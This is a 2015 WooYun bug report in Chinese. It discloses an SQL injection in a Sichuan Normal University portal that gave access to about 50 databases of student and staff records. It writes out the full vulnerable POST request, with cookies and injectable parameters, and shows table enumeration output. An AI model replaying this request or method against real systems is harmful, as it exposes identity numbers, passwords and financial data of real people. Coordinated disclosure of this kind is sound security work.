当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149277

漏洞标题:四川师范大学某站注入导致全校多个数据库泄露

相关厂商:sicnu.edu.cn

漏洞作者: 云袭2001

提交时间:2015-10-26 11:52

修复时间:2015-12-11 08:30

公开时间:2015-12-11 08:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向核心白帽子及相关领域专家公开
2015-11-16: 细节向普通白帽子公开
2015-11-26: 细节向实习白帽子公开
2015-12-11: 细节向公众公开

简要描述:

rt
基本上全校所有人的所有信息都可以get吧

详细说明:

校内信息网:

http://portal.sicnu.edu.cn:82/cas/login?service=http://portal.sicnu.edu.cn/cas.jsp


随便找个学号 + 身份证 登录进去:

1.png


看到有个 “全校本科生学生就业信息”:

2.png


这样提交之后报错:

3.png


4.png


漏洞证明:

SQL注入漏洞
服务端设置了session,一段时间不用就过期了
所以下面的数据包应该已经过期,不过只要找一个新的号码登陆进去,然后即可注入
POST数据包:

POST /report/Report-ResultAction.do?newReport=true HTTP/1.1
Host: portal.sicnu.edu.cn
Content-Length: 153
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://portal.sicnu.edu.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://portal.sicnu.edu.cn/report/Report-EntryAction.do?reportId=e9e03808-309b-47ac-9b5a-32f7962d452e&ticket=ST_M5000-R_-4399-Z8CXZQ0aYqfXAMEefzBU
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _gscu_1801480793=45427787exqcx820; neuportal=sjMNWyvHv3BgTCdn4cGH35Qn111gLWylL36KnJCL80FT06C1X4Qd!-1655473048; JSESSIONID=gy89WyvDdWMpnbt1l0cyfHLhH4LvbfnPK7p6Qr2pGkhzCm3dDnJn!-1655473048
xh=1&xm=1&zy=1&xy=%BB%AF%D1%A7%D3%EB%B2%C4%C1%CF%BF%C6%D1%A7%D1%A7%D4%BA&reportId=e9e03808-309b-47ac-9b5a-32f7962d452e&newReport=null&caption=null&query=


5.png


当前权限:

6.png


50个库:

7.png


基本上全校所有人的所有信息都可以get吧
比如说这个:

Database: WECHAT
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| YKT_BASE_CUSTOMERS | 60377 |
| NETWORK_DEVICE_STATUS | 168 |
| DEVICE_STATUS | 27 |
| PUBLIC_ARTICLE | 8 |
| DEVICE_GROUP | 3 |
| DEVICE_TYPE | 3 |
+-----------------------+---------+


搜了一下个别字段名称,确定这个是一卡通的库:
我们看看都有哪些内容:

8.png


这图我都不知道怎么截了:
卡号(即身份证号)、姓名、密码、 一卡通编号、注册日期、金额
要什么有什么啊
具体的危害可以看这里:
http://www.wooyun.org/bugs/wooyun-2014-054870/
再看看这个:

Database: ICDC_JZG
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| JZG_JZGJBXX_LOG | 3952229 |
| TESTLOG | 274556 |
| JZG_JZGJBXX_FLAG | 8352 |教职工基本信息
| JZG_JZGJBXX | 8351 |教职工基本信息
| TEST2 | 6754 |
| JZG_XZDPZWXX | 4600 |
| JZG_XLXWXX | 3996 |
| JZG_ZZMMXX_BAK091026 | 3623 |
| JZG_LTXXX | 2475 |
| JZG_GRJSDJJZWXX | 2441 |工人技术等级及职务
| TESTKY | 1521 |
| TESTKY1 | 1521 |
| JZG_GWSZQK | 954 |岗位设置情况
| JZG_JZGZPXX | 338 |
| JZG_CGXXGZXX | 115 |
| JZG_RYLXDM | 23 |
| JZG_RYKFL_RS | 14 |
| TEST | 9 |
| JZG_JLIXX | 6 |
| TESTFUNCTION | 6 |
| REPORT_NLJGTJ | 5 |
| SNP_CHECK_TAB | 5 |
| T1 | 3 |
| T2 | 3 |
+----------------------+---------+


到此为止,不再深入

修复方案:

尽快修复吧

版权声明:转载请注明来源 云袭2001@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-27 08:29

厂商回复:

感谢支持!

最新状态:

暂无


漏洞评价:

评价